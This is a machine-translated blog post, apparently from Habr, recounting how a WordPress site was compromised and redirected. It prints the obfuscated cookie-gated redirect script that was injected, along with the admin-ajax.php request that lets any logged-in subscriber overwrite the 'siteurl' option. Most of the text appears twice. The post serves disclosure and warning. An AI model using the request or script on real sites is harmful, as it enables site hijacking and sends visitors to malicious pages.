Critical vulnerability in admin-ajax.php
Last week, faced with a very unpleasant fact. Having logged on to my site, I discovered that it redirects me to an unknown resource, to which Dr. Antivirus is extremely bad. Web
Proudly powered by WordPress version 5.1.
All outgoing updates for the engine, plugin and themes are installed on time. Plugins from official repository only, theme too.
The site backup was immediately downloaded, scanned by antivirus software (Dr.Web, Kaspersky, AI-BOLIT) - but there were no results, everything was clean.
')
The theme files and some plugins were manually checked, but again there was no result.
When checking the database dump in the “wp_options” table in the “siteurl” parameter, someone else's URL was hidden. Actually it was redirected to it.
This happened according to the principle: when the page was loaded, the “siteurl” parameter was substituted into all
At the same time, the following script was loaded:
How someone else's URL got into the database remains a mystery. Changing the URL to the desired one, everything worked again, but the next day, when I checked, I again saw Dr. Web swears on the redirected page. This parameter has been changed again in the database.
After that, fresh logs of access to the site and error logs were downloaded. There were no errors, but in the access logs there was a very interesting request to the site:
Again, correcting the settings and checking that everything works, I tried to repeat this request on the site, but nothing happened. Setting in the database has not changed.
It should be noted that registration is open on the website and users receive the “Subscriber” roles, access to the administrative part is completely closed.
An attempt was made to register a new user, log in and then the request to the site worked, the setting in the database has changed.
The result is that if the registration of users is open on the site, even with the “Subscriber” role and access to the admin panel is denied, this request still works.
It was checked on another site, after turning off all the plug-ins and setting the default theme - the result is the same.
How to deal, except how to turn off the registration and remove suspicious users - I have not found a solution yet.
PS: Googling the request, infected sites were found, be careful.
Proudly powered by WordPress version 5.1.
All outgoing updates for the engine, plugin and themes are installed on time. Plugins from official repository only, theme too.
The site backup was immediately downloaded, scanned by antivirus software (Dr.Web, Kaspersky, AI-BOLIT) - but there were no results, everything was clean.
')
The theme files and some plugins were manually checked, but again there was no result.
When checking the database dump in the “wp_options” table in the “siteurl” parameter, someone else's URL was hidden. Actually it was redirected to it.
This happened according to the principle: when the page was loaded, the “siteurl” parameter was substituted into all
<script type='text/javascript' src=' URL '></script> At the same time, the following script was loaded:
var x = getCookie('pp000001'); if (x) { var x2 = getCookie('pp000002'); if (x2) { var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } else { setCookie('pp000002','1',1); var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } } else { setCookie('pp000001','1',1); var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } function setCookie(name,value,days) { var expires = ""; if (days) { var date = new Date(); date.setTime(date.getTime() + (days*8*60*60*1000)); expires = "; expires=" + date.toUTCString(); } document.cookie = name + "=" + (value || "") + expires + "; path=/"; } function getCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function eraseCookie(name) { document.cookie = name+'=; Max-Age=-99999999;'; } How someone else's URL got into the database remains a mystery. Changing the URL to the desired one, everything worked again, but the next day, when I checked, I again saw Dr. Web swears on the redirected page. This parameter has been changed again in the database.
After that, fresh logs of access to the site and error logs were downloaded. There were no errors, but in the access logs there was a very interesting request to the site:
/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=siteurl&option_value= URL Again, correcting the settings and checking that everything works, I tried to repeat this request on the site, but nothing happened. Setting in the database has not changed.
It should be noted that registration is open on the website and users receive the “Subscriber” roles, access to the administrative part is completely closed.
An attempt was made to register a new user, log in and then the request to the site worked, the setting in the database has changed.
The result is that if the registration of users is open on the site, even with the “Subscriber” role and access to the admin panel is denied, this request still works.
It was checked on another site, after turning off all the plug-ins and setting the default theme - the result is the same.
How to deal, except how to turn off the registration and remove suspicious users - I have not found a solution yet.
PS: Googling the request, infected sites were found, be careful.
Source: https://habr.com/ru/post/455918/
All Articles